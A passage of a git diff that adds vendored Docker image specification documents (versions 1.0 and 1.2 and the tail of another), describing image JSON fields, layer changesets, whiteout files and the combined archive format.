Before committing this directory to a +changeset, because it has a parent image, it is first compared with the +directory tree of the parent snapshot, `f60c56784b83`, looking for files and +directories that have been added, modified, or removed. The following changeset +is found: + +``` +Added: /etc/my-app.d/default.cfg +Modified: /bin/my-app-tools +Deleted: /etc/my-app-config +``` + +A Tar Archive is then created which contains *only* this changeset: The added +and modified files and directories in their entirety, and for each deleted item +an entry for an empty file at the same location but with the basename of the +deleted file or directory prefixed with `.wh.`. The filenames prefixed with +`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible +to create an image root filesystem which contains a file or directory with a +name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has +the following entries: + +``` +/etc/my-app.d/default.cfg +/bin/my-app-tools +/etc/.wh.my-app-config +``` + +Any given image is likely to be composed of several of these Image Filesystem +Changeset tar archives. + +## Combined Image JSON + Filesystem Changeset Format + +There is also a format for a single archive which contains complete information +about an image, including: + + - repository names/tags + - image configuration JSON file + - all tar archives of each layer filesystem changesets + +For example, here's what the full archive of `library/busybox` is (displayed in +`tree` format): + +``` +. +├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json +├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198 +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── manifest.json +└── repositories +``` + +There is a directory for each layer in the image. 
Each directory is named with +a 64 character hex name that is deterministically generated from the layer +information. These names are not necessarily layer DiffIDs or ChainIDs. Each of +these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The legacy JSON metadata for an image layer. In this version of + the image specification, layers don't have JSON metadata, but in + [version 1](v1.md), they did. A file is created for each layer in the + v1 format for backward compatibility. + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +Note that this directory layout is only important for backward compatibility. +Current implementations use the paths specified in `manifest.json`. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +The `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. +This file is only used for backwards compatibility. Current implementations use +the `manifest.json` file instead. + +The `manifest.json` file provides the image JSON for the top-level image, and +optionally for parent images that this image was derived from. It consists of +an array of metadata entries: + +``` +[ + { + "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json", + "RepoTags": ["busybox:latest"], + "Layers": [ + "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar", + "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar" + ] + } +] +``` + +There is an entry in the array for each image. 
+ +The `Config` field references another file in the tar which includes the image +JSON for this image. + +The `RepoTags` field lists references pointing to this image. + +The `Layers` field points to the filesystem changeset tars. + +An optional `Parent` field references the imageID of the parent image. This +parent must be part of the same `manifest.json` file. + +This file shouldn't be confused with the distribution manifest, used to push +and pull images. + +Generally, implementations that support this version of the spec will use +the `manifest.json` file if available, and older implementations will use the +legacy `*/json` files and `repositories`. diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md new file mode 100644 index 0000000000..6c641cafec --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.2.md @@ -0,0 +1,696 @@ +# Docker Image Specification v1.2.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. + +This version of the image specification was adopted starting in Docker 1.12. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Each layer is a set of filesystem + changes. Layers do not have configuration metadata such as environment + variables or default arguments - these are properties of the image as a + whole rather than any particular layer. +
+
+ Image JSON +
+
+ Each image has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. The JSON structure also references a cryptographic hash of + each layer used by the image, and provides history information for + those layers. This JSON is considered to be immutable, because changing + it would change the computed ImageID. Changing it means creating a new + derived image, instead of changing the existing image. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Layer DiffID +
+
+ Layers are referenced by cryptographic hashes of their serialized + representation. This is a SHA256 digest over the tar archive used to + transport the layer, represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Layers must be packed and unpacked reproducibly to avoid changing the + layer ID, for example by using tar-split to save the tar headers. Note + that the digest used as the layer ID is taken over an uncompressed + version of the tar. +
+
+ Layer ChainID +
+
+ For convenience, it is sometimes useful to refer to a stack of layers + with a single identifier. This is called a ChainID. For a + single layer (or the layer at the bottom of a stack), the + ChainID is equal to the layer's DiffID. + Otherwise the ChainID is given by the formula: + ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN)). +
+
+ ImageID +
+
+ Each image's ID is given by the SHA256 hash of its configuration JSON. It is + represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Since the configuration JSON that gets hashed references hashes of each + layer in the image, this formulation of the ImageID makes images + content-addressable. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. Tag values are limited to the set of characters + [a-zA-Z0-9_.-], except they may not start with a . + or - character. Tags are limited to 127 characters. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. A repository name is made up of slash-separated + name components, optionally prefixed by a DNS hostname. The hostname + must comply with standard DNS rules, but may not contain + _ characters. If a hostname is present, it may optionally + be followed by a port number in the format :8080. + Name components may contain lowercase characters, digits, and + separators. A separator is defined as a period, one or two underscores, + or one or more dashes. A name component may not start or end with + a separator. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "created": "2015-10-31T22:22:56.015925234Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + }, + "rootfs": { + "diff_ids": [ + "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ], + "type": "layers" + }, + "history": [ + { + "created": "2015-10-31T22:22:54.690851953Z", + "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /" + }, + { + "created": "2015-10-31T22:22:55.613815829Z", + "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]", + "empty_layer": true + } + ] +} +``` + +Note that image JSON files produced by Docker don't contain formatting +whitespace. It has been added to this example for clarity. + +### Image JSON Field Descriptions + +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Healthcheck struct +
+
+ A test to perform to determine whether the container is healthy. + Here is an example: +
{
+  "Test": [
+      "CMD-SHELL",
+      "/usr/bin/check-health localhost"
+  ],
+  "Interval": 30000000000,
+  "Timeout": 10000000000,
+  "Retries": 3
+}
+ The object has the following fields. +
+
+ Test array of strings +
+
+ The test to perform to check that the container is healthy. + The options are: +
    +
  • [] : inherit healthcheck from base image
  • +
  • ["NONE"] : disable healthcheck
  • +
  • ["CMD", arg1, arg2, ...] : exec arguments directly
  • +
  • ["CMD-SHELL", command] : run command with system's default shell
  • +
+ + The test command should exit with a status of 0 if the container is healthy, + or with 1 if it is unhealthy. +
+
+ Interval integer +
+
+ Number of nanoseconds to wait between probe attempts. +
+
+ Timeout integer +
+
+ Number of nanoseconds to wait before considering the check to have hung. +
+
+ Retries integer +
+
+ The number of consecutive failures needed to consider a container as unhealthy. +
+
+ + In each case, the field can be omitted to indicate that the + value should be inherited from the base layer. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {}
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ rootfs struct +
+
+ The rootfs key references the layer content addresses used by the + image. This makes the image config hash depend on the filesystem hash. + rootfs has two subkeys: + +
    +
  • + type is usually set to layers. +
  • +
  • + diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most. +
  • +
+ + + Here is an example rootfs section: + +
"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}
+
+
+ history struct +
+
+ history is an array of objects describing the history of + each layer. The array is ordered from bottom-most layer to top-most + layer. The object has the following fields. + +
    +
  • + created: Creation time, expressed as an ISO-8601 formatted + combined date and time +
  • +
  • + author: The author of the build point +
  • +
  • + created_by: The command which created the layer +
  • +
  • + comment: A custom message set when creating the layer +
  • +
  • + empty_layer: This field is used to mark if the history + item created a filesystem diff. It is set to true if this history + item doesn't correspond to an actual layer in the rootfs section + (for example, a command like ENV which results in no change to the + filesystem). +
  • +
+ +Here is an example history section: + +
"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory. Here is the +initial empty directory structure for the a changeset using the +randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are +generated based on the content](#id_desc)). + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +To make changes to the filesystem of this container image, create a new +directory, such as `f60c56784b83`, and initialize it with a snapshot of the +parent image's root filesystem, so that the directory is identical to that +of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very +efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. The `f60c56784b83` +directory then looks like this: + +``` +f60c56784b83/ + etc/ + my-app.d/ + default.cfg + bin/ + my-app-binary + my-app-tools +``` + +This reflects the removal of `/etc/my-app-config` and creation of a file and +directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been +replaced with an updated version. 
Before committing this directory to a +changeset, because it has a parent image, it is first compared with the +directory tree of the parent snapshot, `f60c56784b83`, looking for files and +directories that have been added, modified, or removed. The following changeset +is found: + +``` +Added: /etc/my-app.d/default.cfg +Modified: /bin/my-app-tools +Deleted: /etc/my-app-config +``` + +A Tar Archive is then created which contains *only* this changeset: The added +and modified files and directories in their entirety, and for each deleted item +an entry for an empty file at the same location but with the basename of the +deleted file or directory prefixed with `.wh.`. The filenames prefixed with +`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible +to create an image root filesystem which contains a file or directory with a +name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has +the following entries: + +``` +/etc/my-app.d/default.cfg +/bin/my-app-tools +/etc/.wh.my-app-config +``` + +Any given image is likely to be composed of several of these Image Filesystem +Changeset tar archives. + +## Combined Image JSON + Filesystem Changeset Format + +There is also a format for a single archive which contains complete information +about an image, including: + + - repository names/tags + - image configuration JSON file + - all tar archives of each layer filesystem changesets + +For example, here's what the full archive of `library/busybox` is (displayed in +`tree` format): + +``` +. +├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json +├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198 +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── manifest.json +└── repositories +``` + +There is a directory for each layer in the image. 
Each directory is named with +a 64 character hex name that is deterministically generated from the layer +information. These names are not necessarily layer DiffIDs or ChainIDs. Each of +these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The legacy JSON metadata for an image layer. In this version of + the image specification, layers don't have JSON metadata, but in + [version 1](v1.md), they did. A file is created for each layer in the + v1 format for backward compatibility. + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +Note that this directory layout is only important for backward compatibility. +Current implementations use the paths specified in `manifest.json`. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +The `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. +This file is only used for backwards compatibility. Current implementations use +the `manifest.json` file instead. + +The `manifest.json` file provides the image JSON for the top-level image, and +optionally for parent images that this image was derived from. It consists of +an array of metadata entries: + +``` +[ + { + "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json", + "RepoTags": ["busybox:latest"], + "Layers": [ + "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar", + "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar" + ] + } +] +``` + +There is an entry in the array for each image. 
+ +The `Config` field references another file in the tar which includes the image +JSON for this image. + +The `RepoTags` field lists references pointing to this image. + +The `Layers` field points to the filesystem changeset tars. + +An optional `Parent` field references the imageID of the parent image. This +parent must be part of the same `manifest.json` file. + +This file shouldn't be confused with the distribution manifest, used to push +and pull images. + +Generally, implementations that support this version of the spec will use +the `manifest.json` file if available, and older implementations will use the +legacy `*/json` files and `repositories`. diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md new file mode 100644 index 0000000000..57a599b8ff --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.md @@ -0,0 +1,573 @@ +# Docker Image Specification v1.0.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Image layer is a general + term which may be used to refer to one or both of the following: + +
    +
  1. The metadata for the layer, described in the JSON format.
  2. +
  3. The filesystem changes described by a layer.
  4. +
+ + To refer to the former you may use the term Layer JSON or + Layer Metadata. To refer to the latter you may use the term + Image Filesystem Changeset or Image Diff. +
+
+ Image JSON +
+
+ Each layer has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Image ID +
+
+ Each layer is given an ID upon its creation. It is + represented as a hexadecimal encoding of 256 bits, e.g., + a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Image IDs should be sufficiently random so as to be globally unique. + 32 bytes read from /dev/urandom is sufficient for all + practical purposes. Alternatively, an image ID may be derived as a + cryptographic hash of image contents as the result is considered + indistinguishable from random. The choice is left up to implementors. +
+
+ Image Parent +
+
+ Most layer metadata structs contain a parent field which + refers to the Image from which another directly descends. An image + contains a separate JSON metadata file and set of changes relative to + the filesystem of its parent image. Image Ancestor and + Image Descendant are also common terms. +
+
+ Image Checksum +
+
+ Layer metadata structs contain a cryptographic hash of the contents of + the layer's filesystem changeset. Though the set of changes exists as a + simple Tar archive, two archives with identical filenames and content + will have different SHA digests if the last-access or last-modified + times of any entries differ. For this reason, image checksums are + generated using the TarSum algorithm which produces a cryptographic + hash of file contents and selected headers only. Details of this + algorithm are described in the separate TarSum specification. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. An image name suffix (the name component after :) is + often referred to as a tag as well, though it strictly refers to the + full name of an image. Acceptable values for a tag suffix are + implementation specific, but they SHOULD be limited to the set of + alphanumeric characters [a-zA-z0-9], punctuation + characters [._-], and MUST NOT contain a : + character. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. Acceptable values for repository name are + implementation specific, but they SHOULD be limited to the set of + alphanumeric characters [a-zA-z0-9], and punctuation + characters [._-], however it MAY contain additional + / and : characters for organizational + purposes, with the last : character being interpreted + dividing the repository component of the name from the tag suffix + component. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "id": "a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9", + "parent": "c6e3cedcda2e3982a1a6760e178355e8e65f7b80e4e5248743fa3549d284e024", + "checksum": "tarsum.v1+sha256:e58fcf7418d2390dec8e8fb69d88c06ec07039d651fedc3aa72af9972e7d046b", + "created": "2014-10-13T21:19:18.674353812Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "Size": 271828, + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + } +} +``` + +### Image JSON Field Descriptions + +
+
+ id string +
+
+ Randomly generated, 256-bit, hexadecimal encoded. Uniquely identifies + the image. +
+
+ parent string +
+
+ ID of the parent image. If there is no parent image then this field + should be omitted. A collection of images may share many of the same + ancestor layers. This organizational structure is strictly a tree with + any one layer having either no parent or a single parent and zero or + more descendant layers. Cycles are not allowed and implementations + should be careful to avoid creating them or iterating through a cycle + indefinitely. +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ checksum string +
+
+ Image Checksum of the filesystem changeset associated with the image + layer. +
+
+ Size integer +
+
+ The size in bytes of the filesystem changeset associated with the image + layer. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory named with the +ID of the image being created. Here is the initial empty directory structure +for the changeset for an image with ID `c3167915dc9d` ([real IDs are much +longer](#id_desc), but this example use a truncated one here for brevity. +Implementations need not name the rootfs directory in this way but it may be +convenient for keeping record of a large number of image layers.): + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +The TarSum checksum for the archive file is then computed and placed in the +JSON metadata along with the execution parameters. + +To make changes to the filesystem of this container image, create a new +directory named with a new ID, such as `f60c56784b83`, and initialize it with +a snapshot of the parent image's root filesystem, so that the directory is +identical to that of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem +can make this very efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. 
The `f60c56784b83`
+directory then looks like this:
+
+```
+f60c56784b83/
+    etc/
+        my-app.d/
+            default.cfg
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This reflects the removal of `/etc/my-app-config` and creation of a file and
+directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been
+replaced with an updated version. Before committing this directory to a
+changeset, because it has a parent image, it is first compared with the
+directory tree of the parent snapshot, `c3167915dc9d`, looking for files and
+directories that have been added, modified, or removed. The following changeset
+is found:
+
+```
+Added:      /etc/my-app.d/default.cfg
+Modified:   /bin/my-app-tools
+Deleted:    /etc/my-app-config
+```
+
+A Tar Archive is then created which contains *only* this changeset: The added
+and modified files and directories in their entirety, and for each deleted item
+an entry for an empty file at the same location but with the basename of the
+deleted file or directory prefixed with `.wh.`. The filenames prefixed with
+`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible
+to create an image root filesystem which contains a file or directory with a
+name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has
+the following entries:
+
+```
+/etc/my-app.d/default.cfg
+/bin/my-app-tools
+/etc/.wh.my-app-config
+```
+
+Any given image is likely to be composed of several of these Image Filesystem
+Changeset tar archives.
+
+## Combined Image JSON + Filesystem Changeset Format
+
+There is also a format for a single archive which contains complete information
+about an image, including:
+
+ - repository names/tags
+ - all image layer JSON files
+ - all tar archives of each layer filesystem changesets
+
+For example, here's what the full archive of `library/busybox` is (displayed in
+`tree` format):
+
+```
+.
+├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c +│   ├── VERSION +│   ├── json +│   └── layer.tar +└── repositories +``` + +There are one or more directories named with the ID for each layer in a full +image. Each of these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The JSON metadata for an image layer + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +And the `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. + +## Loading an Image Filesystem Changeset + 